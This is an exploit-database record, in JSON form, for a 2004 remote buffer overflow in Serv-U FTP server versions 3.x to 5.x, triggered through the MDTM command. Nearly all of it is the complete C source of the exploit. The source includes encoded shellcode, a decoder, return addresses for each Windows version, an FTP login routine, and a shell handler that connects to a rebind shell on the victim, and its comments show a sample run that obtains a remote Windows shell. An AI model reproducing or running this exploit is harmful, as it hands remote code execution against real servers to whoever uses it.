{"id": "EDB-ID:158", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "RhinoSoft Serv-U FTPd Server 3.x/4.x/5.x - 'MDTM' Remote Overflow", "description": "", "published": "2004-02-27T00:00:00", "modified": "2004-02-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/158", "reporter": "Sam", "references": [], "cvelist": ["2004-0330"], "immutableFields": [], "lastseen": "2022-08-16T09:44:16", "viewCount": 25, "enchantments": {"dependencies": {}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "_state": {"dependencies": 1661182887, "score": 1661176728, "epss": 1678791570}, "_internal": {"score_hash": "ed6e2a27c5dc1c67900b42463c2b9ba3"}, "sourceHref": "https://www.exploit-db.com/download/158", "sourceData": "/* ex_servu.c - Serv-U FTPD 3.x/4.x/5.x \"MDTM\" Command remote overflow exploit\r\n*\r\n* Copyright (c) SST 2004 All rights reserved.\r\n*\r\n* Public version\r\n*\r\n* BUG find by bkbll (bkbll@cnhonker.com), cool! :ppPPppPPPpp :D\r\n*\r\n* code by Sam and 2004/01/07\r\n* <chen_xiaobo@venustech.com.cn>\r\n* <Sam@0x557.org>\r\n* \r\n*\r\n* Revise History:\r\n* 2004/01/14 add rebind shellcode :> we can bind shellport at ftpd port.\r\n* 2004/01/09 connect back shellcode added :)\r\n* 2004/01/08 21:04 upgrade now :), we put shellcode in file parameter\r\n* we can attack pacthed serv-U;PPPp by airsupply\r\n* 2004/01/08 change shellcode working on serv-u 4.0/4.1/4.2 now \r\n* :D thx airsupply\r\n*\r\n* Compile: gcc -o ex_servu ex_servu.c\r\n*\r\n* how works?\r\n* [root@core exp]# ./sv -h 192.168.10.119 -t 3\r\n* Serv-U FTPD 3.x/4.x MDTM Command remote overflow exploit\r\n* bug find by bkbll (bkbll@cnhonker.com) code by Sam (Sam@0x557.org)\r\n*\r\n* # Connecting......\r\n* [+] Connected.\r\n* [*] USER ftp .\r\n* [*] 10 bytes send.\r\n* [*] PASS sst@SERV-u .\r\n* [*] 17 bytes send.\r\n* [+] login success .\r\n* [+] remote version: Serv-U v4.x with Windows XP EN SP1\r\n* [+] trigger vulnerability !\r\n* [+] 1027 bytes overflow strings sent!\r\n* [+] successed!!\r\n*\r\n*\r\n* Microsoft Windows XP [Version 5.1.2600]\r\n* (C) Copyright 1985-2001 Microsoft Corp.\r\n*\r\n* [Sam Chen@SAM C:\\]#\r\n*\r\n*\r\n* some thanks/greets to:\r\n* bkbll (he find this bug :D), airsupply, kkqq, icbm\r\n* and everyone else who's KNOW SST;P\r\n* http://0x557.org\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdarg.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netinet/tcp.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <assert.h>\r\n#include <fcntl.h>\r\n#include <sys/time.h>\r\n\r\n#define VER \"v5.0\"\r\n\r\n#define clearbit(buff) bzero(buff, sizeof (buff));\r\n#define padding(buff, a) memset(buff, a, sizeof (buff));\r\n\r\n#define MAX_LEN 2048\r\n#define MAX_NUM 4\r\n\r\nint x = 0, port = 21, shellport;\r\nchar pass[20], user[20];\r\n\r\nstruct archs {\r\n char *desc;\r\n unsigned int magic;\r\n\r\n}architectures[] = {\r\n\r\n\r\n {\r\n \"Serv-U v3.x/4.x/5.x with Windows 2K CN\", //winmm.dll\r\n 0x77535985\r\n\r\n },\r\n {\r\n \"Serv-U v3.x/4.x/5.x with Windows 2K BIG5 version\", //winmm.dll\r\n 0x77531790\r\n\r\n },\r\n {\r\n \"Serv-U v3.x/4.x/5.x with Windows 2K EN\",\r\n 0x77575985\r\n\r\n },\r\n\r\n {\r\n \"Serv-U v3.x/4.x/5.x with Windows XP CN SP1\",\r\n 0x76b12f69\r\n\r\n },\r\n {\r\n \"Serv-U v3.x/4.x/5.x with Windows XP EN SP1\",\r\n 0x76b42a3a\r\n\r\n}\r\n\r\n};\r\n\r\nchar decoder [] =\r\n/* 36 bytes cool decoder by airsupply :) */\r\n\r\n\"\\x90\\x90\\x90\\x5E\\x5F\\x5B\\xBE\\x52\\x52\\x49\\x41\\x46\\xBF\\x52\\x52\\x31\"\r\n\"\\x41\\x47\\x43\\x39\\x3B\\x75\\xFB\\x4B\\x80\\x33\\x99\\x39\\x73\\xFC\\x75\\xF7\"\r\n\"\\xFF\\xD3\\x90\\x90\";\r\n\r\n/* fork + rebind shellcode by airsupply (one way shellcode) */\r\nchar shellcode [] =\r\n\r\n\"\\x53\\x52\\x49\\x41\"\r\n\r\n/*port offset 120 + 4*/\r\n\"\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\\xD9\\x85\\x12\\x99\\x12\\xD9\"\r\n\"\\x91\\x18\\x75\\x19\\x98\\x99\\x99\\x12\\x65\\x12\\x76\\x32\\x70\\x8B\\x9B\\x99\"\r\n\"\\x99\\xC7\\xAA\\x50\\x28\\x90\\x66\\xEE\\x65\\x71\\xB9\\x98\\x99\\x99\\xF1\\xF5\"\r\n\"\\xF5\\x99\\x99\\xF1\\xAA\\xAB\\xB7\\xFD\\xF1\\xEE\\xEA\\xAB\\xC6\\xCD\\x66\\xCC\"\r\n\"\\x9D\\x32\\xAA\\x50\\x28\\x9C\\x66\\xEE\\x65\\x71\\x99\\x98\\x99\\x99\\x12\\x6C\"\r\n\"\\x71\\x94\\x98\\x99\\x99\\xAA\\x66\\x18\\x75\\x09\\x98\\x99\\x99\\xCD\\xF1\\x98\"\r\n\"\\x98\\x99\\x99\\x66\\xCF\\xB5\\xC9\\xC9\\xC9\\xC9\\xD9\\xC9\\xD9\\xC9\\x66\\xCF\"\r\n\"\\xA9\\x12\\x41\\xCE\\xCE\\xF1\\x9B\\x99\\x8C\\x5B\\x12\\x55\\xCA\\xC8\\xF3\\x8F\"\r\n\"\\xC8\\xCA\\x66\\xCF\\xAD\\xC0\\xC2\\x1C\\x59\\xEC\\x68\\xCE\\xCA\\x66\\xCF\\xA1\"\r\n\"\\xCE\\xC8\\xCA\\x66\\xCF\\xA5\\x12\\x49\\x10\\x1F\\xD9\\x98\\x99\\x99\\xF1\\xFC\"\r\n\"\\xE1\\xFC\\x99\\xF1\\xFA\\xF4\\xFD\\xB7\\x10\\x3F\\xA9\\x98\\x99\\x99\\x1A\\x75\"\r\n\"\\xCD\\x14\\xA5\\xBD\\xAA\\x59\\xAA\\x50\\x1A\\x58\\x8C\\x32\\x7B\\x64\\x5F\\xDD\"\r\n\"\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA5\\x67\\xDD\\xBD\\xA4\\x10\\xCD\\xBD\\xD1\\x10\"\r\n\"\\xCD\\xBD\\xD5\\x10\\xCD\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\x14\\x27\\xDD\\x98\\x99\"\r\n\"\\x99\\xCE\\xC9\\xC8\\xC8\\xC8\\xD8\\xC8\\xD0\\xC8\\xC8\\x66\\x2F\\xA9\\x98\\x99\"\r\n\"\\x99\\xC8\\x66\\xCF\\x91\\xAA\\x59\\xD1\\xC9\\x66\\xCF\\x95\\xCA\\xCC\\xCF\\xCE\"\r\n\"\\x12\\xF5\\xBD\\x81\\x12\\xDC\\xA5\\x12\\xCD\\x9C\\xE1\\x9A\\x4C\\x12\\xD3\\x81\"\r\n\"\\x12\\xC3\\xB9\\x9A\\x44\\x7A\\xA9\\xD0\\x12\\xAD\\x12\\x9A\\x6C\\xAA\\x66\\x65\"\r\n\"\\xAA\\x59\\x35\\xA3\\x79\\xED\\x9E\\x58\\x56\\x9E\\x9A\\x61\\x72\\x6B\\xA2\\xE5\"\r\n\"\\xBD\\x8D\\xEC\\x78\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\"\r\n\"\\x9A\\x44\\x12\\x9D\\x12\\x9A\\x5C\\xC6\\xC7\\xC4\\xC2\\x5B\\x9D\\x99\\xC8\\x66\"\r\n\"\\xED\\xBD\\x91\\x34\\xC9\\x71\\x3B\\x66\\x66\\x66\\x1A\\x5D\\x9D\\xC0\\x32\\x7B\"\r\n\"\\x74\\x5A\\xF1\\xFC\\xE1\\xFC\\x99\\xF1\\xFA\\xF4\\xFD\\xB7\\x10\\x3F\\xA9\\x98\"\r\n\"\\x99\\x99\\x1A\\x75\\xCD\\x14\\xA5\\xBD\\xAA\\x59\\xAA\\x50\\x1A\\x58\\x8C\\x32\"\r\n\"\\x7B\\x64\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA5\\x67\\xDD\\xBD\\xA4\\x10\"\r\n\"\\xDD\\xBD\\xD1\\x10\\xDD\\xBD\\xD5\\x10\\xDD\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\x14\"\r\n\"\\x27\\xDD\\x98\\x99\\x99\\xCE\\xC9\\xC8\\xC8\\xF3\\x9D\\xC8\\xC8\\xC8\\x66\\x2F\"\r\n\"\\xA9\\x98\\x99\\x99\\xC8\\x66\\xCF\\x91\\x18\\x75\\x99\\x9D\\x99\\x99\\xF1\\x9E\"\r\n\"\\x99\\x98\\x99\\xCD\\x66\\x2F\\xD1\\x98\\x99\\x99\\x66\\xCF\\x89\\xF3\\xD9\\xF1\"\r\n\"\\x99\\x89\\x99\\x99\\xF1\\x99\\xC9\\x99\\x99\\xF3\\x99\\x66\\x2F\\xDD\\x98\\x99\"\r\n\"\\x99\\x66\\xCF\\x8D\\x10\\x1D\\xBD\\x21\\x99\\x99\\x99\\x10\\x1D\\xBD\\x2D\\x99\"\r\n\"\\x99\\x99\\x12\\x15\\xBD\\xF9\\x9D\\x99\\x99\\x5E\\xD8\\x62\\x09\\x09\\x09\\x09\"\r\n\"\\x5F\\xD8\\x66\\x09\\x1A\\x70\\xCC\\xF3\\x99\\xF1\\x99\\x89\\x99\\x99\\xC8\\xC9\"\r\n\"\\x66\\x2F\\xDD\\x98\\x99\\x99\\x66\\xCF\\x81\\xCD\\x66\\x2F\\xD1\\x98\\x99\\x99\"\r\n\"\\x66\\xCF\\x85\\x66\\x2F\\xD1\\x98\\x99\\x99\\x66\\xCF\\xB9\\xAA\\x59\\xD1\\xC9\"\r\n\"\\x66\\xCF\\x95\\x71\\x70\\x64\\x66\\x66\\xAB\\xED\\x08\\x95\\x50\\x25\\x3F\\xF2\"\r\n\"\\x16\\x6B\\x81\\xF8\\x51\\xCE\\xD6\\x88\\x68\\xE2\\x05\\x76\\xC1\\x96\\xD8\\x0E\"\r\n\"\\x51\\xCE\\xD6\\x8E\\x4F\\x15\\x07\\x6A\\xFA\\x10\\x48\\xD6\\xA4\\xF3\\x2D\\x19\"\r\n\"\\xB4\\xAB\\xE1\\x47\\xFD\\x89\\x3E\\x44\\x95\\x06\\x4A\\xD2\\x28\\x87\\x0E\\x98\"\r\n\"\\x06\\x06\\x06\\x06\"\r\n\"\\x53\\x52\\x31\\x41\";\r\n\r\n\r\n/* new:\r\n* tcp connect with no block socket, host to ip.\r\n* millisecond timeout, it's will be fast.\r\n*;D\r\n* 2003/06/23 add by Sam\r\n*/\r\nint new_tcpConnect (char *host, unsigned int port, unsigned int timeout)\r\n{\r\n int sock,\r\n flag,\r\n pe = 0;\r\n size_t pe_len;\r\n struct timeval tv;\r\n struct sockaddr_in addr;\r\n struct hostent* hp = NULL;\r\n fd_set rset;\r\n\r\n // reslov hosts\r\n hp = gethostbyname (host);\r\n if (NULL == hp) {\r\n perror (\"tcpConnect:gethostbyname\\n\");\r\n return -1;\r\n }\r\n\r\n sock = socket (AF_INET, SOCK_STREAM, 0);\r\n if (-1 == sock) {\r\n perror (\"tcpConnect:socket\\n\");\r\n return -1;\r\n }\r\n\r\n addr.sin_addr = *(struct in_addr *) hp->h_addr;\r\n addr.sin_family = AF_INET;\r\n addr.sin_port = htons (port);\r\n\r\n /* set socket no block\r\n */\r\n flag = fcntl (sock, F_GETFL);\r\n if (-1 == flag) {\r\n perror (\"tcpConnect:fcntl\\n\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n flag |= O_NONBLOCK;\r\n if (fcntl (sock, F_SETFL, flag) < 0) {\r\n perror (\"tcpConnect:fcntl\\n\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n if (connect (sock, (const struct sockaddr *) &addr,\r\n sizeof(addr)) < 0 &&\r\n errno != EINPROGRESS) {\r\n perror (\"tcpConnect:connect\\n\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n /* set connect timeout\r\n * use millisecond\r\n */\r\n tv.tv_sec = timeout/1000;\r\n tv.tv_usec = timeout%1000;\r\n\r\n FD_ZERO (&rset);\r\n FD_SET (sock, &rset);\r\n\r\n if (select (sock+1, &rset, &rset, NULL, &tv) <= 0) {\r\n// perror (\"tcpConnect:select\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n pe_len = sizeof (pe);\r\n\r\n if (getsockopt (sock, SOL_SOCKET, SO_ERROR, &pe, &pe_len) < 0) {\r\n perror (\"tcpConnect:getsockopt\\n\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n if (pe != 0) {\r\n errno = pe;\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n if (fcntl(sock, F_SETFL, flag&~O_NONBLOCK) < 0) {\r\n perror (\"tcpConnect:fcntl\\n\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n pe = 1;\r\n pe_len = sizeof (pe);\r\n\r\n if (setsockopt (sock, IPPROTO_TCP, TCP_NODELAY, &pe, pe_len) < 0){\r\n perror (\"tcpConnect:setsockopt\\n\");\r\n close (sock);\r\n return -1;\r\n }\r\n\r\n return sock;\r\n}\r\n\r\n/* rip code, from hsj */\r\nint sh (int in, int out, int s)\r\n{\r\n char sbuf[128], rbuf[128];\r\n int i,\r\n ti, fd_cnt,\r\n ret=0, slen=0, rlen=0;\r\n fd_set rd, wr;\r\n\r\n fd_cnt = in > out ? in : out;\r\n fd_cnt = s > fd_cnt ? s : fd_cnt;\r\n fd_cnt ++;\r\n\r\n for (;;) {\r\n FD_ZERO (&rd);\r\n if (rlen < sizeof (rbuf))\r\n FD_SET (s, &rd);\r\n if (slen < sizeof (sbuf))\r\n FD_SET (in, &rd);\r\n\r\n FD_ZERO (&wr);\r\n if (slen)\r\n FD_SET (s, &wr);\r\n if (rlen)\r\n FD_SET (out, &wr);\r\n\r\n if ((ti = select (fd_cnt, &rd, &wr, 0, 0)) == (-1))\r\n break;\r\n if (FD_ISSET (in, &rd)) {\r\n if((i = read (in, (sbuf+slen),\r\n (sizeof (sbuf) - slen))) == (-1)) {\r\n ret = -2;\r\n break;\r\n }\r\n else if (i == 0) {\r\n ret = -3;\r\n break;\r\n }\r\n slen += i;\r\n if (!(--ti))\r\n continue;\r\n }\r\n if (FD_ISSET (s, &wr)) {\r\n if ((i = write (s, sbuf, slen)) == (-1))\r\n break;\r\n if (i == slen)\r\n slen = 0;\r\n else {\r\n slen -= i;\r\n memmove (sbuf, sbuf + i, slen);\r\n }\r\n if (!(--ti))\r\n continue;\r\n }\r\n if (FD_ISSET (s, &rd)) {\r\n if ((i = read (s, (rbuf + rlen),\r\n (sizeof (rbuf) - rlen))) <= 0)\r\n break;\r\n rlen += i;\r\n if (!(--ti))\r\n continue;\r\n }\r\n if (FD_ISSET (out, &wr)) {\r\n if ((i = write (out, rbuf, rlen)) == (-1))\r\n break;\r\n if (i == rlen)\r\n rlen = 0;\r\n else {\r\n rlen -= i;\r\n memmove (rbuf, rbuf+i, rlen);\r\n }\r\n }\r\n }\r\n return ret;\r\n}\r\n\r\n\r\nint new_send (int fd, char *buff, size_t len)\r\n{\r\n int ret;\r\n\r\n if ((ret = send (fd, buff, len, 0)) <= 0) {\r\n perror (\"new_write\");\r\n return -1;\r\n }\r\n\r\n return ret;\r\n\r\n}\r\n\r\nint new_recv (int fd, char *buff, size_t len)\r\n{\r\n int ret;\r\n\r\n if ((ret = recv (fd, buff, len, 0)) <= 0) {\r\n perror (\"new_recv\");\r\n return -1;\r\n }\r\n\r\n return ret;\r\n}\r\n\r\nint ftp_login (char *hostName, short port, char *user, char *pass)\r\n{\r\n int ret, sock;\r\n char buff[MAX_LEN];\r\n\r\n fprintf (stderr, \"# Connecting...... \\n\");\r\n if ((sock = new_tcpConnect (hostName, port, 4000)) <= 0) {\r\n fprintf (stderr, \"[-] failed. \\n\");\r\n return -1;\r\n }\r\n\r\n clearbit (buff);\r\n\r\n new_recv (sock, buff, sizeof (buff) - 1);\r\n if (!strstr (buff, \"220\")) {\r\n fprintf (stderr, \"[-] failed. \\n\");\r\n return -1;\r\n }\r\n fprintf (stderr, \"[+] Connected. \\n\");\r\n\r\n sleep (1);\r\n fprintf (stderr, \"[*] USER %s .\\n\", user);\r\n clearbit (buff);\r\n snprintf (buff, sizeof (buff), \"USER %s\\r\\n\", user);\r\n ret = new_send (sock, buff, strlen (buff));\r\n fprintf (stderr, \"[*] %d bytes send. \\n\", ret);\r\n\r\n sleep (1);\r\n\r\n clearbit (buff);\r\n new_recv (sock, buff, sizeof (buff) - 1);\r\n if (!strstr (buff, \"331\")) {\r\n fprintf (stderr, \"[-] user failed. \\n%s\\n\", buff);\r\n return -1;\r\n }\r\n\r\n fprintf (stderr, \"[*] PASS %s .\\n\", pass);\r\n clearbit (buff);\r\n snprintf (buff, sizeof (buff), \"PASS %s\\r\\n\", pass);\r\n ret = new_send (sock, buff, strlen (buff));\r\n fprintf (stderr, \"[*] %d bytes send. \\n\", ret);\r\n\r\n sleep (1);\r\n\r\n clearbit (buff);\r\n new_recv (sock, buff, sizeof (buff) - 1);\r\n if (!strstr (buff, \"230\")) {\r\n fprintf (stderr, \"[-] pass failed. \\n%s\\n\", buff);\r\n return -1;\r\n }\r\n\r\n fprintf (stderr, \"[+] login success .\\n\");\r\n\r\n return sock;\r\n\r\n}\r\n\r\nvoid do_overflow (int sock)\r\n{\r\n int ret, i;\r\n unsigned short newport;\r\n char Comand [MAX_LEN] = {0}, chmodBuffer [600], rbuf[256];\r\n\r\n clearbit (Comand);\r\n clearbit (rbuf);\r\n\r\n clearbit (chmodBuffer);\r\n \r\n for(i = 0; i < 47; i++) \r\n strcat(chmodBuffer, \"a\");\r\nfor(i = 0; i < 16; i += 8) {\r\n *(unsigned int*)&chmodBuffer[47+i] = 0x06eb9090;\r\n *(unsigned int*)&chmodBuffer[51+i] = architectures[x].magic; //0x1002bd78; //pop reg pop reg ret\r\n}\r\n\r\n\r\nnewport = htons (shellport)^(unsigned short)0x9999;\r\nmemcpy (&shellcode[120 + 4], &newport, 2);\r\n\r\n strcat(chmodBuffer, decoder);\r\n \r\n\r\n fprintf (stderr, \"[+] remote version: %s\\n\", architectures[x].desc);\r\n\r\n fprintf (stderr, \"[+] trigger vulnerability !\\n \");\r\n strcpy (Comand, \"MDTM 20031111111111+\");\r\n strncat (Comand, chmodBuffer, strlen (chmodBuffer) - 1);\r\n strcat (Comand, \" \");\r\n\r\n\r\n strcat (Comand, shellcode);\r\n \r\n strcat (Comand, \"hacked_by.sst\\r\\n\");\r\n\r\n ret = new_send (sock, Comand, strlen (Comand));\r\n fprintf (stderr, \"[+] %d bytes overflow strings sent!\\n\", ret);\r\n\r\n\r\n return;\r\n}\r\n\r\n/* print help messages.\r\n* just show ya how to use.\r\n*/\r\nvoid showHELP (char *p)\r\n{\r\n int i;\r\n\r\n fprintf (stderr, \"Usage: %s [Options] \\n\", p);\r\n fprintf (stderr, \"Options:\\n\"\r\n \"\\t-h [remote host]\\tremote host\\n\"\r\n \"\\t-P [server port]\\tserver port\\n\"\r\n \"\\t-t [system type]\\tchoice the system type\\n\"\r\n \"\\t-u [user name]\\tlogin with this username\\n\"\r\n \"\\t-p [pass word]\\tlogin with this passwd\\n\"\r\n \"\\t-d [shell port]\\trebind using this port (default: ftpd port)\\n\\n\");\r\n\r\n\r\n printf (\"num . description\\n\");\r\n printf (\"----+-----------------------------------------------\"\r\n \"--------\\n\");\r\n for (i = 0; i <= MAX_NUM; i ++) {\r\n printf (\"%3d | %s\\n\", i, architectures[i].desc);\r\n }\r\n printf (\" '\\n\");\r\n return;\r\n}\r\n\r\nint main (int c, char *v[])\r\n{\r\n int ch, fd, sd;\r\n char *hostName = NULL, *userName = \"ftp\", *passWord = \"sst@SERV-u\";\r\n shellport = port;\r\n \r\n\r\n fprintf (stderr, \"Serv-U FTPD 3.x/4.x/5.x MDTM Command remote overflow exploit \"VER\"\\n\"\r\n \"bug find by bkbll (bkbll@cnhonker.net) code by Sam (Sam@0x557.org)\\n\\n\");\r\n\r\n if (c < 2) {\r\n showHELP (v[0]);\r\n exit (1);\r\n }\r\n\r\n while((ch = getopt(c, v, \"h:t:u:p:P:c:d:\")) != EOF) {\r\n switch(ch) {\r\n case 'h':\r\n hostName = optarg;\r\n break;\r\n case 't':\r\n x = atoi (optarg);\r\n if (x > MAX_NUM) {\r\n printf (\"[-] wtf your input?\\n\");\r\n exit (-1);\r\n }\r\n break;\r\n case 'u':\r\n userName = optarg;\r\n break;\r\n case 'p':\r\n passWord = optarg;\r\n break;\r\n case 'P':\r\n port = atoi (optarg);\r\n break;\r\n case 'd':\r\n shellport = atoi (optarg);\r\n break;\r\n default:\r\n showHELP (v[0]);\r\n return 0;\r\n }\r\n }\r\n\r\n\r\n fd = ftp_login (hostName, port, userName, passWord);\r\n if (fd <= 0) {\r\n printf (\"[-] can't connnect\\n\");\r\n exit (-1);\r\n }\r\n\r\n do_overflow (fd);\r\n\r\nclose (fd);\r\n \r\n sleep (3);\r\n \r\n sd = new_tcpConnect (hostName, shellport, 3000);\r\n if (sd <= 0) {\r\n printf (\"[-] failed\\n\");\r\n return -1;\r\n }\r\n\r\n fprintf (stderr, \"[+] successed!!\\n\\n\\n\");\r\n sh (0, 1, sd);\r\n\r\n close (sd);\r\n\r\n return 0;\r\n}\r\n\r\n\r\n\r\n// milw0rm.com [2004-02-27]", "osvdbidlist": ["4073"], "exploitType": "remote", "verified": true}
{}
RhinoSoft Serv-U FTPd Server 3.x/4.x/5.x - 'MDTM' Remote Overflow